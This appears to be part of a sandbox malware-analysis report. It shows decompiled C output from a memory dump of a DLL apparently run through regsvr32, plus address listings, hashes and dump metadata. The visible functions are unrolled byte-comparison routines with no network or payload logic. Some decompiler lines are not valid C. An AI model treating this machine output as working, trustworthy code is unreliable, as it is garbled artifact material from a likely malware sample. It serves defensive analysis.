														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}






























                                                                                                                0x1004b05e
                                                                                                                0x1004b05e
                                                                                                                0x1004b064
                                                                                                                0x1004b0e3
                                                                                                                0x1004b0e5
                                                                                                                0x1004b0e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0ed
                                                                                                                0x1004b0f3
                                                                                                                0x1004b172
                                                                                                                0x1004b174
                                                                                                                0x1004b176
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b17c
                                                                                                                0x1004b182
                                                                                                                0x1004b201
                                                                                                                0x1004b203
                                                                                                                0x1004b205
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b20b
                                                                                                                0x1004b211
                                                                                                                0x1004b290
                                                                                                                0x1004b292
                                                                                                                0x1004b294
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b29a
                                                                                                                0x1004b2a0
                                                                                                                0x1004b31f
                                                                                                                0x1004b321
                                                                                                                0x1004b323
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b32f
                                                                                                                0x1004b3af
                                                                                                                0x1004b3b1
                                                                                                                0x1004b3b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b3b9
                                                                                                                0x1004b3bf
                                                                                                                0x1004b43e
                                                                                                                0x1004b440
                                                                                                                0x1004b442
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b450
                                                                                                                0x1004b452
                                                                                                                0x1004b463
                                                                                                                0x1004b463
                                                                                                                0x1004b058
                                                                                                                0x1004bdb4
                                                                                                                0x1004bdb4
                                                                                                                0x1004b3c8
                                                                                                                0x1004b3ca
                                                                                                                0x1004b3e1
                                                                                                                0x1004b3e9
                                                                                                                0x1004b3eb
                                                                                                                0x1004b402
                                                                                                                0x1004b40a
                                                                                                                0x1004b40c
                                                                                                                0x1004b423
                                                                                                                0x1004b42b
                                                                                                                0x1004b42d
                                                                                                                0x1004b43a
                                                                                                                0x1004b43a
                                                                                                                0x00000000
                                                                                                                0x1004b42d
                                                                                                                0x1004b419
                                                                                                                0x1004b41d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b41d
                                                                                                                0x1004b3f8
                                                                                                                0x1004b3fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b3fc
                                                                                                                0x1004b3d7
                                                                                                                0x1004b3db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b3db
                                                                                                                0x1004b339
                                                                                                                0x1004b33b
                                                                                                                0x1004b352
                                                                                                                0x1004b35a
                                                                                                                0x1004b35c
                                                                                                                0x1004b373
                                                                                                                0x1004b37b
                                                                                                                0x1004b37d
                                                                                                                0x1004b394
                                                                                                                0x1004b39c
                                                                                                                0x1004b39e
                                                                                                                0x1004b3ab
                                                                                                                0x1004b3ab
                                                                                                                0x00000000
                                                                                                                0x1004b39e
                                                                                                                0x1004b38a
                                                                                                                0x1004b38e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b38e
                                                                                                                0x1004b369
                                                                                                                0x1004b36d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b36d
                                                                                                                0x1004b348
                                                                                                                0x1004b34c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b34c
                                                                                                                0x1004b2a9
                                                                                                                0x1004b2ab
                                                                                                                0x1004b2c2
                                                                                                                0x1004b2ca
                                                                                                                0x1004b2cc
                                                                                                                0x1004b2e3
                                                                                                                0x1004b2eb
                                                                                                                0x1004b2ed
                                                                                                                0x1004b304
                                                                                                                0x1004b30c
                                                                                                                0x1004b30e
                                                                                                                0x1004b31b
                                                                                                                0x1004b31b
                                                                                                                0x00000000
                                                                                                                0x1004b30e
                                                                                                                0x1004b2fa
                                                                                                                0x1004b2fe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b2fe
                                                                                                                0x1004b2d9
                                                                                                                0x1004b2dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b2dd
                                                                                                                0x1004b2b8
                                                                                                                0x1004b2bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b2bc
                                                                                                                0x1004b21a
                                                                                                                0x1004b21c
                                                                                                                0x1004b233
                                                                                                                0x1004b23b
                                                                                                                0x1004b23d
                                                                                                                0x1004b254
                                                                                                                0x1004b25c
                                                                                                                0x1004b25e
                                                                                                                0x1004b275
                                                                                                                0x1004b27d
                                                                                                                0x1004b27f
                                                                                                                0x1004b28c
                                                                                                                0x1004b28c
                                                                                                                0x00000000
                                                                                                                0x1004b27f
                                                                                                                0x1004b26b
                                                                                                                0x1004b26f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b26f
                                                                                                                0x1004b24a
                                                                                                                0x1004b24e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b24e
                                                                                                                0x1004b229
                                                                                                                0x1004b22d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b22d
                                                                                                                0x1004b18b
                                                                                                                0x1004b18d
                                                                                                                0x1004b1a4
                                                                                                                0x1004b1ac
                                                                                                                0x1004b1ae
                                                                                                                0x1004b1c5
                                                                                                                0x1004b1cd
                                                                                                                0x1004b1cf
                                                                                                                0x1004b1e6
                                                                                                                0x1004b1ee
                                                                                                                0x1004b1f0
                                                                                                                0x1004b1fd
                                                                                                                0x1004b1fd
                                                                                                                0x00000000
                                                                                                                0x1004b1f0
                                                                                                                0x1004b1dc
                                                                                                                0x1004b1e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b1e0
                                                                                                                0x1004b1bb
                                                                                                                0x1004b1bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b1bf
                                                                                                                0x1004b19a
                                                                                                                0x1004b19e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b19e
                                                                                                                0x1004b0fc
                                                                                                                0x1004b0fe
                                                                                                                0x1004b115
                                                                                                                0x1004b11d
                                                                                                                0x1004b11f
                                                                                                                0x1004b136
                                                                                                                0x1004b13e
                                                                                                                0x1004b140
                                                                                                                0x1004b157
                                                                                                                0x1004b15f
                                                                                                                0x1004b161
                                                                                                                0x1004b16e
                                                                                                                0x1004b16e
                                                                                                                0x00000000
                                                                                                                0x1004b161
                                                                                                                0x1004b14d
                                                                                                                0x1004b151
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b151
                                                                                                                0x1004b12c
                                                                                                                0x1004b130
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b130
                                                                                                                0x1004b10b
                                                                                                                0x1004b10f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b066
                                                                                                                0x1004b066
                                                                                                                0x1004b069
                                                                                                                0x1004b06d
                                                                                                                0x1004b06f
                                                                                                                0x1004b086
                                                                                                                0x1004b086
                                                                                                                0x1004b08a
                                                                                                                0x1004b08e
                                                                                                                0x1004b090
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0a7
                                                                                                                0x1004b0ab
                                                                                                                0x1004b0af
                                                                                                                0x1004b0b1
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0c8
                                                                                                                0x1004b0cc
                                                                                                                0x1004b0d0
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0d8
                                                                                                                0x1004b0db
                                                                                                                0x1004b0df
                                                                                                                0x1004b0df
                                                                                                                0x00000000
                                                                                                                0x1004b0d2
                                                                                                                0x1004b0b7
                                                                                                                0x1004b0ba
                                                                                                                0x1004b0be
                                                                                                                0x1004b0c2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0c2
                                                                                                                0x1004b096
                                                                                                                0x1004b099
                                                                                                                0x1004b09d
                                                                                                                0x1004b0a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b0a1
                                                                                                                0x1004b075
                                                                                                                0x1004b078
                                                                                                                0x1004b07c
                                                                                                                0x1004b080
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b080
                                                                                                                0x1004ac83
                                                                                                                0x1004ac83
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction ID: b09dc26b6cbd36b72d4a4843220875c77306704c7617d04a292ef27add846ef7
                                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction Fuzzy Hash: 65C17F73C0EDB30A83B5C12D41A826FEBA2AFC159232BC3F48CD47F389956A5D4496D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004AC8A Relevance: .4, Instructions: 351COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004AC8A(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}































                                                                                                                0x1004ac8a
                                                                                                                0x1004ac8a
                                                                                                                0x1004ac90
                                                                                                                0x1004ad03
                                                                                                                0x1004ad05
                                                                                                                0x1004ad07
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad0d
                                                                                                                0x1004ad13
                                                                                                                0x1004ad92
                                                                                                                0x1004ad94
                                                                                                                0x1004ad96
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ad9c
                                                                                                                0x1004ada2
                                                                                                                0x1004ae21
                                                                                                                0x1004ae23
                                                                                                                0x1004ae25
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004ae2b
